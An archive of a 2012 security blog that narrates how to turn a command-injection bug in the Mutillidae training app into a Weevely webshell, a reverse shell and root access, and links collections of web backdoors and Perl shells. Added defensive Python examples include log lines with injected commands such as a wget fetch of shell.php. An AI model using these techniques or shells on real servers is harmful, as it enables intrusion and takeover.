So, we have written an article about PHP Command Injection (it applies to other platforms too; we just covered PHP).
Read it here! PHP Command Injection - Insecurety Research
More to come...
~Insecurety Research Team.
A simple Infosec/Security/Computing blog with a smattering of electronics, chemistry, and total randomness
Showing posts with label Backdoor.
Thursday, 15 March 2012
Wednesday, 7 March 2012
[Article] Reverse shells...
Ok. So I wrote a short article yesterday showing off a few reverse shell tricks and demoing them on a vulnerable web app using a Command Injection vulnerability.
Some people were asking "why it so basic?" and here is why: The idea of the article is not to provide script kids/blackhats with new info - it is well known - but to demonstrate how one can go from a small PHP bug to a full blown reverse shell.
I will be working up Snort IDS signatures for them all based on how they throw a shell back; I just have to get some nice .pcaps of it first. I also plan to find a way to "signature" the IDS-evading shellcode I wrote, and so have a kind of "arms race" with myself...
Article on Insecurety.net
Friday, 2 March 2012
WebApp Haxploitation with Weevely, Introducing InterSect.
Ok. This is a fairly pointless demo I made to demonstrate how a web-application bug (in this case LFI + Command Injection) can be leveraged to gain complete root access over a server. I simply took a bunch of screencaps during the demo I made to show a friend "Why web app bugs are dangerous".
So. Here goes!
The web app we used here was THIS: Mutillidae - IronGeek
Part One: The Buggy Page.
This shows the buggy application's vulnerable page. It is a simple "Do a DNS lookup" page; just by looking at it we can tell it certainly has a Local File Inclusion vulnerability and, more than likely, a Command Injection vulnerability as well.
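For the defender's side of that page, here is an added example (not code from the original post, from Mutillidae, or from any of the tools named here): the allow-list check a DNS lookup form should apply before it ever builds a command, and a scan over web-server access-log lines that flags requests failing the same check. The `target_host` parameter name, the Apache-style log format, the `nslookup` argument vector and the sample log lines are all my assumptions or constructed for the example.

```python
"""Allow-list validation for a "DNS lookup" form parameter, plus a scan of
web-server access-log lines for requests that fail that allow-list.
Added example, not code from the original post or from Mutillidae."""
import re
from urllib.parse import urlsplit, parse_qs

# A hostname is labels of letters, digits and hyphens joined by dots.
# Nothing else (;, |, &, $, backticks, spaces, slashes) can ever be valid,
# so every injection attempt fails this check before any command is built.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\.?$"
)


def is_valid_hostname(value):
    return bool(HOSTNAME_RE.match(value))


def build_lookup_argv(host):
    """Return the argv for the lookup. The command is an argument vector,
    never a shell string, so even a value that slipped past validation
    could not be interpreted as extra shell commands."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["nslookup", host]  # assumed lookup tool; any argv-based call works


# Apache combined-log prefix: client, ident, user, time, request, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Parameter name is an assumption; adjust it to the application's form field.
PARAM = "target_host"


def scan_access_log(lines):
    """Return (client_ip, decoded_value) for each request whose lookup
    parameter is not a plain hostname. Only query-string parameters are
    visible here; a POST body never reaches the access log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for raw in params.get(PARAM, []):  # parse_qs already URL-decodes
            if not is_valid_hostname(raw):
                hits.append((client, raw))
    return hits


# Constructed sample lines (not real traffic): two normal lookups and two
# requests whose parameter carries shell metacharacters.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Mar/2012:10:15:01 +0000] "GET /index.php?page=dns-lookup.php&target_host=example.com HTTP/1.1" 200 1234',
    '10.0.0.5 - - [02/Mar/2012:10:15:07 +0000] "GET /index.php?page=dns-lookup.php&target_host=127.0.0.1 HTTP/1.1" 200 1190',
    '10.0.0.9 - - [02/Mar/2012:10:16:22 +0000] "GET /index.php?page=dns-lookup.php&target_host=127.0.0.1%3Bid HTTP/1.1" 200 1402',
    '10.0.0.9 - - [02/Mar/2012:10:17:45 +0000] "GET /index.php?page=dns-lookup.php&target_host=127.0.0.1%3Bwget+http%3A%2F%2Fstaging.example%2Fshell.php HTTP/1.1" 200 1390',
]

if __name__ == "__main__":
    for client, value in scan_access_log(SAMPLE_LOG):
        print(f"{client}: rejected lookup parameter {value!r}")
```

The same regex serves as the fix and the detection rule: anything a shell could interpret is simply not a hostname, so the check does not need a deny-list of metacharacters that an encoder could sidestep. Note the limitation the comment spells out: if the form submits by POST, the access log will not show the parameter, which is where network-level signatures of the kind mentioned in the reverse shells post come in.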
Part Two: Let's Look for LFI
So. I knew there was LFI, and decided I would let fimap check for me, to see whether I could pull off any LFI-to-RCE tricks.
So. Now we know fimap can't get RCE on the site, however there IS LFI. I want RCE, so I move swiftly along to the second vulnerability: command injection.
Part Three: Command Injection
I decided to inject a Weevely Webshell into the app, so I put it up on my webserver and used wget to "inject" it.
Here is a screencap...
Ok. Shell seems injected, so we move on and try to connect to it using the Weevely client.
Part Four: There are Weevils In Your WWWROOT
Connecting to Weevely's PHP backdoor with the client. This is too easy...
So, let's see what it looks like in there...
SO! Got remote code execution and a "shell"-like session. Let's see if Weevely's reverse shell works for us and try to become uid=0 :D
Part Five: Netcat Says Meow
First off, we start Weevely's reverse shell plugin and tell it to phone home to us... We will be listening for it...
Ok. Now for the listener end of things...
w00t! We haz a shell :D
... Moving Swiftly along...
We check the kernel version and randomly see which commands work. I decided to run lsusb for some arbitrary reason. Don't ask.
Ok. So we move on to escalating/exploring!
Part Six: Enter InterSect.
So I decide to test out InterSect, a wonderful post-exploitation tool developed by ohdae of BindShell Labs.
Here is a screencap of wgetting Intersect to the target box...
Aaaaand now to RUN Intersect ......
Ok. Intersect does not want to run as non-root, so it tells me how to get root on the box... Seeing as I like root... let's go get some!
Part Seven: We Are uid=0, + Harvest Some Infodox
So. I simply run a hypothetical root exploit I had left in /tmp and get r00t! (It was actually a SUID shell I dropped earlier, as my kernel doesn't like local roots and panics!)
So. Got root. What next? Let's see if InterSect wants to run this time...
It Works! Sadly my battery promptly /quit a moment later but I think you get the idea of what you can do!
LINKS:
BindShell Labs
Intersect 2 - GitHub
Weevely - GoogleCode
Fimap - GoogleCode
And Finally
Insecurety Research
Labels: attack tools, Backdoor, exploit, Fimap, Hackers, Hacking, insecurety, Intersect, linux, local root, OWASP, Owned, PHP, PHP Backdoors, Reverse Shell, root, suid, Web App, website, Weevely
Tuesday, 21 February 2012
Web Malware Collection - more Updates!
So, I have been grepping and searching through logs and Google searches, hunting for malware to add. And oh lord, I am finding a LOT!
Lately I started hunting through Pastebin for "more malware" and such, and am slowly amassing a fairly epic amount to sort. I also have to handle submissions, honeypot logs, etc.
So, check out the project page! Web Malware Collection
Labels: ASP, ASP Shell, Backdoor, Hacking, JSP, JSP Shell, Perl, PHP, PHP Backdoors, Reverse Shell
Thursday, 16 February 2012
Web Malware Collection Updated
Ok, quick post. The Web Malware Collection has had some updates done, and I am *Still* busy sorting samples to commit.
Currently it has 443 samples (according to this "find . -type f | wc -l" command).
Project Page: http://insecurety.net/projects/web-malware/
GoogleCode: http://code.google.com/p/web-malware-collection/
SVN repo is on GoogleCode so SVN up :D
Labels: ASP, ASP Shell, attack tools, Backdoor, insecurety, JSP, JSP Shell, malware, Nastyware, Perl, PHP, Reverse Shell, Security, Web App
Monday, 30 January 2012
Web Application Backdoors Collection: v2.0
This is the SVN for web app backdoors. As I find 'em, I add 'em. I also try to purge dupes from time to time, but have not got a good method of doing so just yet.
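An added example for the dupe-purging problem here and for the sample count in the earlier "Web Malware Collection Updated" post (this is not the collection's own tooling): it walks a sample tree, counts the same population that `find . -type f | wc -l` counts, and groups files by SHA-256 so byte-for-byte repeats under different names show up regardless of filename. The sample collection the block builds in a temp directory is constructed for the example, not real malware.

```python
"""Inventory a web-shell sample collection: count files and find byte-for-byte
duplicates by SHA-256, so repeats can be purged without trusting filenames.
Added example, not part of the original collection's tooling."""
import hashlib
import os
import tempfile
from collections import defaultdict


def sha256_file(path, chunk=1 << 16):
    """Stream the file so large samples do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def inventory(root):
    """Walk root; return (file_count, {digest: [paths...]}) covering every
    regular file, the same population `find . -type f | wc -l` counts."""
    by_hash = defaultdict(list)
    count = 0
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            count += 1
            by_hash[sha256_file(path)].append(path)
    return count, dict(by_hash)


def duplicates(by_hash):
    """Digests seen in more than one file, each with its sorted paths.
    The first path is the copy to keep; the rest are candidates to purge."""
    return {d: sorted(p) for d, p in by_hash.items() if len(p) > 1}


def make_sample_collection():
    """Build a constructed (not real) collection in a temp dir: three
    distinct 'shells' plus one renamed copy and one nested copy."""
    root = tempfile.mkdtemp(prefix="webshell-samples-")
    os.makedirs(os.path.join(root, "php"))
    os.makedirs(os.path.join(root, "perl", "old"))
    samples = {
        "php/a.php": b"<?php /* constructed sample A */ ?>",
        "php/b.php": b"<?php /* constructed sample B */ ?>",
        "php/a_copy.txt": b"<?php /* constructed sample A */ ?>",
        "perl/c.pl": b"#!/usr/bin/perl # constructed sample C",
        "perl/old/c.pl": b"#!/usr/bin/perl # constructed sample C",
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    root = make_sample_collection()
    count, by_hash = inventory(root)
    print(f"{count} samples, {len(by_hash)} unique by SHA-256")
    for digest, paths in duplicates(by_hash).items():
        rel = ", ".join(os.path.relpath(p, root) for p in paths)
        print(digest[:12], "->", rel)
```

Hashing on content rather than name also gives the AV side something useful for free: the digest list is the first thing a signature writer wants, and a sample that was re-uploaded with one byte changed (a re-keyed password, a planted second backdoor) will correctly show up as a new file rather than being silently dropped as a dupe.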
I also plan to eventually analyse them for backdoors, so if you find a backdoor in one please mail me so I can mark it as backdoored.
Finally, I take NO RESPONSIBILITY WHATSOEVER for ANY use of this collection, it is designed for educational purposes and so you AV people can write signatures for this shit.
So SVN UP!!
Web Shell Collection
Friday, 27 January 2012
Web Backdoors: Video
This is a video I made to quickly demonstrate some Web App Backdoors.
I demonstrate Weevely; FireInTheHole.py; PHPSploit; and two standard "web shells", the WSO2.php shell and the ITSecTeam shell.
I occasionally comment on each one's shortfalls, but here is the simple TL;DR version.
Weevely is amazing to use, has LOADS of features, and the netcat bind and backconnect shells work perfectly, but it is slightly confusing for the first-time user. It also remembers your current working dir and has a very intuitive shell (just like BASH) and fairly good error handling.
You can get it HERE: Weevely
FireInTheHole.py is fast, simple to use, uses POST and/or GET and gives a terminal-like session. It has no advanced features but has a couple of bugs, namely its non-interactive state. It *does* remember your current working dir, however, which is very advantageous.
You can download it HERE: Fireinthehole.py
PHPSploit is a VERY nice "framework" which is currently in beta and has great potential. It looks a LOT like Metasploit, and I envision it becoming popular sometime in the future. It works fine, allows you to pull a lot of info, however it has some issues. It does not remember current working dir at all, so it can be rather annoying to "stack" commands for different dirs.
You can download it HERE: PHPSploit
I then demo the WSO2 PHP backdoor, which was failing pretty hard (some functions missing), and the ITSecTeam PHP backdoor, which seems designed to be "skid friendly" and has loads of features. I suspect both may be backdoored but have not investigated... YET. Neither had a functional backconnect or bindshell, and both had a load of errors/bugs. I recommend *not* using these. You may find examples on Google, and I plan to upload them myself later.
Now it's video time!
Thursday, 5 January 2012
Collection of web app backdoors (v1)
This is a collection of the common PHP (and ASP if I find them) backdoors used by malicious hackers to take over servers.
I am NOT responsible for your use of this!
Warning: There is every possibility these backdoors may be backdoored. I am going to eventually sort them into two folders - backdoored backdoors and clean backdoors. Then I can sit back and watch y'all go apeshit at some skiddies who backdoor their backdoors :D
Download the list here...Web Backdoors
Tuesday, 3 January 2012
Quick Post - package of Perl shells
Ok, very short post. 4 Perl shells/backdoors: 3 are reverse shells and one is a bind shell. Seems to me everyone uses the same trick to get a reverse shell :/
Anyways, more to come later! Download link below!
Perl Shells Tarball